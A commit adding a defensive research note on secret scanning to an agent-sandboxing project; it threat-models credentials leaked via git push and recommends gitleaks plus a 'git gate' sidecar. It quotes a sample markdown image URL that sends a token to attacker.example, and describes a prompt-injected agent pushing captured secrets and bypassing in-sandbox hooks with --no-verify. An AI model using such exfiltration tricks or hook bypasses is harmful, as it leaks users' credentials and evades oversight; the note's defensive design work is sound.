docs(research): add note on git secret-scanning as defense-in-depth
test / unit (push) Successful in 12s
test / integration (push) Successful in 15s

Threat-models the case where a credential ends up in a tracked
file and is git-pushed to a public remote — the secret is
compromised the instant the push lands (events API, scrapers),
not at merge time. Recommends gitleaks as the smallest-blast-
radius layer to add: Go binary, MIT, offline, scans full history,
hookable from the existing .githooks/.

No code or workflow change; just the research note.
This commit is contained in:
2026-05-12 16:24:06 -04:00
parent 9827b86063
commit 96d2c7b7a1
@@ -0,0 +1,246 @@
# Git secret scanning as further hardening
Research into whether claude-bottle should add a secret-scanning step to
its git workflow — both on the host repo and (potentially) inside
bottles — and what tools exist for it. Motivated by the threat model
below: a secret accidentally `git push`ed to a public remote is
*already compromised* the moment the push hits the wire, well before
anyone clicks "merge."
## Summary
A pre-commit / pre-push secret scanner is a cheap, high-leverage layer
of defense-in-depth that doesn't replace any existing control
(`.gitignore`, environment-variable hygiene, network egress guards) but
catches the one case where everything else fails: a credential ending
up in a tracked file or commit message and being pushed to a public
remote. For claude-bottle specifically, `gitleaks` is the clearest fit
— Go binary, MIT, scans full history including commit messages, runs
fully offline, and integrates with the existing `.githooks/` directory
without adding a new runtime.
## Attack vector: a secret pushed to a public GitHub repo
The naive mental model is "if I notice the leak before the PR is
merged, I can force-push and the secret is gone." That mental model is
wrong in two distinct ways, and both apply *the instant* `git push`
completes — not at merge time.
### 1. The push itself publishes the secret
The moment a commit lands on a public GitHub repo — on any branch, in
any open PR, on any fork — it is publicly fetchable by URL and
broadcast by GitHub's event firehose:
- The commit blob is reachable at `github.com/<owner>/<repo>/commit/<sha>`
and via the raw API. No login or merge required.
- GitHub's public events API streams every push as it happens. The
GH Archive project mirrors that stream and republishes it; multiple
Common-Crawl-style datasets ingest from it on a continuous basis.
- Independent scrapers (and there are *many*) sit on the events API
watching specifically for commits whose diffs match high-value
credential patterns — AWS keys, GitHub PATs, Stripe keys, OAuth
tokens, OpenAI keys, etc. Empirically, observed time-to-abuse for a
leaked AWS key on a public push is on the order of *seconds to
minutes*. The window in which "I'll just force-push" still works
effectively does not exist.
- Even after a force-push, the orphaned commit remains reachable by
SHA until GitHub's garbage collection runs (and the SHA itself
leaks via the events API). Treat any secret that has touched a
public remote as burned: rotate it.
This is the dominant risk, and on its own it is enough to justify
pre-push secret scanning.
### 2. Render-time callbacks fire even on un-merged PRs
A separate, sneakier vector: a public PR doesn't have to be *merged*
to cause an outbound request to a server the pusher controls. Opening
the PR is enough. Rendering surfaces along the review path will fetch
remote resources embedded in the diff or in PR metadata:
- **Markdown files in the diff** are rendered with image and link
preview support. An `![](https://attacker.example/pixel.png?token=…)`
in a new README pings the attacker the moment a reviewer (or
GitHub's own renderer warming a cache) views the file. GitHub
proxies most image fetches through `camo.githubusercontent.com`,
which mitigates direct IP capture but *does not stop the fetch
itself* — the attacker still gets the request, and the URL path
can carry exfiltrated bytes.
- **PR body, commit message, and issue body** all render markdown
with the same image/link semantics. A poisoned commit message
with an embedded image URL pings home when the PR is opened in the
web UI, regardless of merge state.
- **Link unfurls** in PR descriptions, Slack notifications wired to
the repo, and various CI bots all dereference URLs at preview time.
Each is an independent "ping home" opportunity.
- **CI on PR open** runs on the fork's HEAD by default for many
workflow types. Any `curl` in a build step is an exfil channel
before a human ever looks at the PR.
The composite point: by the time a reviewer thinks "hmm, this looks
suspicious, let me close without merging," the bytes that mattered are
already on the attacker's box. Detection has to be at *commit* time
(or *push* time at the latest), not at review time.
### Why this matters for claude-bottle
Two surfaces are exposed:
1. **The claude-bottle repo itself.** Development happens on a host
with `CLAUDE_BOTTLE_OAUTH_TOKEN`, Gitea tokens, and other
credentials in the environment. A fixture, test snapshot, log
capture, or pasted-in debug output could carry one of them into a
tracked file. The repo's Gitea remote is private, but mirrors or
GitHub forks may not be.
2. **Bottles that push to external remotes.** An agent inside a bottle
that has been granted git push credentials to a public repo is one
prompt-injection away from being induced to commit a captured token
and push it. The egress guard catches *most* exfiltration channels
(`statsig`, `npm`, arbitrary HTTPS), but `git push` to an
allowlisted code host is by design an outbound channel that *works*.
That is the whole point of letting the agent push code. A secret
scanner inside the bottle's git hooks is the only layer that can
intercept content before it leaves on an otherwise-legitimate
channel.
The first surface is the primary one for this note. The second
*looks* harder — anything inside the bottle is by assumption
adversary-controlled, so an in-bottle hook can be bypassed with
`--no-verify`, removed outright, or simply not configured — but it
yields to the same trick already used for the OAuth token and HTTPS
inspection: move the check across a kernel-enforced process boundary
that the agent cannot reach.
### Solution for the bottle surface: a git gate
Route bottle-side `git push` through an intermediary git endpoint —
a "git gate" — that runs gitleaks on the incoming objects before
forwarding to the real remote:
- The bottle's git remote is rewritten to point at the gate (e.g.
`git@gate.bottle.local:owner/repo.git`, or an HTTPS endpoint on a
loopback / sidecar address). The agent inside the bottle sees only
the gate URL.
- The gate runs as a separate process / container that the bottle's
unprivileged agent cannot read or modify. It holds the real push
credential (deploy key, PAT, ssh agent socket) — the bottle never
sees it, same as the auth-injecting proxy for `ANTHROPIC_BASE_URL`
in `oauth-token-exposure-to-claude.md`.
- On receive, the gate runs `gitleaks detect` against the incoming
refs (and their message text) in a temporary working tree. Clean
pushes are forwarded to the real remote. Findings cause the push to
be rejected; the agent sees a normal-looking `remote: rejected`
message.
- Network egress out of the bottle is locked to the gate only.
Direct pushes to `github.com`, `gitlab.com`, etc., fail at the
egress layer, so the agent cannot bypass the gate by reconfiguring
the remote URL. The egress guard already in `network-egress-guard.md`
is the load-bearing control here.
Properties this gives:
- **`--no-verify` does not help the attacker** — the check runs on the
*receiving* side, not in a client hook.
- **Bypass attempts fail closed.** Removing the remote, force-pushing,
pushing to a different host, or shelling out around git all hit the
same egress allowlist.
- **The push credential never enters the bottle.** Compromising the
agent doesn't compromise the credential, only the ability to ask the
gate to push on its behalf — and the gate refuses dirty pushes.
- **Pattern is reusable.** The gate is shape-compatible with the
auth-injecting proxy and with pipelock's TLS interception: a
sidecar that holds the credential, enforces a policy on traffic,
and is unreachable by the unprivileged in-bottle UID.
Open questions deferred to design work, not blockers for this note:
- SSH vs HTTPS for the bottle→gate hop. SSH lets the agent use a
per-bottle key the gate authenticates; HTTPS over loopback is
simpler and pairs naturally with pipelock.
- Whether the gate should also enforce repo / branch allowlists per
bottle, or stay narrowly focused on secret scanning. Probably
narrow first, expand later.
- Performance on large pushes. gitleaks on a few-MB diff is sub-second;
on a large monorepo first push it may take seconds. Acceptable.
## Tool landscape (2026)
| Tool | Install | Full history | Commit msgs | Detection | Status | License |
|---|---|---|---|---|---|---|
| **gitleaks** | `brew install gitleaks` | yes (`--log-opts="--all"`) | yes | regex + entropy, ~150 rules | very active (v8.x) | MIT |
| **TruffleHog v3** | `brew`, Docker, GH Action | yes | yes | regex + **live API verification** (700+ types) | very active | AGPL-3.0 |
| **detect-secrets** (Yelp) | `pip install` | working tree + baseline | no | regex + entropy | active, slower cadence | Apache 2.0 |
| **git-secrets** (AWS Labs) | `brew` | yes (`--scan-history`) | yes | regex only, AWS-focused | maintenance mode since ~2021 | Apache 2.0 |
| **ggshield** (GitGuardian) | `pip install` | yes | yes | proprietary ML + regex, optional verified | very active, commercial | MIT CLI, SaaS engine |
Other names that surfaced but do not fit: Semgrep (general SAST, not
git-history-native), `whispers` (Python, low adoption).
Notes on the contenders:
- **gitleaks** is the de-facto open-source standard. The `protect
--staged` mode is purpose-built for pre-commit; the `detect
--log-opts="--all"` mode walks every commit including message text.
No network dependency.
- **TruffleHog v3** is the strongest one-shot auditor because it can
make live API calls to confirm whether a found credential is still
valid. AGPL is fine for internal use but a consideration if the
detection step gets embedded in a redistributable artifact. Best as
a "run once on history" tool, not as the everyday hook.
- **detect-secrets** is well-loved for its baseline-file workflow (you
declare existing secrets as known and only fail on new ones), but
commit-message scanning is not first-class.
- **git-secrets** is effectively superseded by gitleaks. No reason to
start a new project on it.
- **ggshield** is good if you want a hosted dashboard and incident
management, but it ships repo content to GitGuardian's API by
default — wrong fit for a project whose entire premise is sandbox
isolation.
## Commit message scanning
Several real-world leaks have come from secrets pasted into commit
messages (often by automation that includes captured CLI output in
auto-generated messages). gitleaks, TruffleHog, git-secrets, and
ggshield all scan message text in history mode. detect-secrets does
not — it is content-focused. Anyone using detect-secrets should pair
it with a separate message-scanning step.
## Recommended path forward
In priority order, for the host claude-bottle repo:
1. **One-time retro scan** with gitleaks:
`gitleaks detect --source . --log-opts="--all" --redact`.
Catches anything currently in history including commit messages.
`--redact` keeps any findings out of the rendered output. Treat any
hit as a rotated credential, not as a "fix the commit" problem (see
attack-vector section above for why).
2. **Add a pre-commit hook in `.githooks/`** that runs
`gitleaks protect --staged`. Fits the project's existing pattern
(the conventional-commits `commit-msg` hook lives there), needs no
new runtime, fully offline.
3. **Optional one-time live-verification pass** with TruffleHog:
`trufflehog git file://. --only-verified`. Tells you whether any
historically leaked credential is still active — actionable in a
way pattern-matching alone is not.
For the bottle surface, the follow-up is the git-gate design sketched
above: a sidecar git endpoint that bottles push to, that runs
gitleaks on incoming refs before forwarding to the real remote, with
egress locked to the gate so the agent cannot push directly. Tracked
as a future PRD; ordering it after the network egress guard is
correct because the egress allowlist is the control that prevents
bypass and is therefore the prerequisite.
## Sources
- [gitleaks — GitHub repository](https://github.com/gitleaks/gitleaks)
- [TruffleHog — GitHub repository](https://github.com/trufflesecurity/trufflehog)
- [detect-secrets — GitHub repository](https://github.com/Yelp/detect-secrets)
- [git-secrets — AWS Labs GitHub repository](https://github.com/awslabs/git-secrets)
- [GitGuardian ggshield](https://github.com/GitGuardian/ggshield)
- [GH Archive — public GitHub event firehose mirror](https://www.gharchive.org/)
- [GitHub camo image proxy documentation](https://github.com/atmos/camo)
- [Truffle Security — "How fast are leaked secrets abused?"](https://trufflesecurity.com/blog/)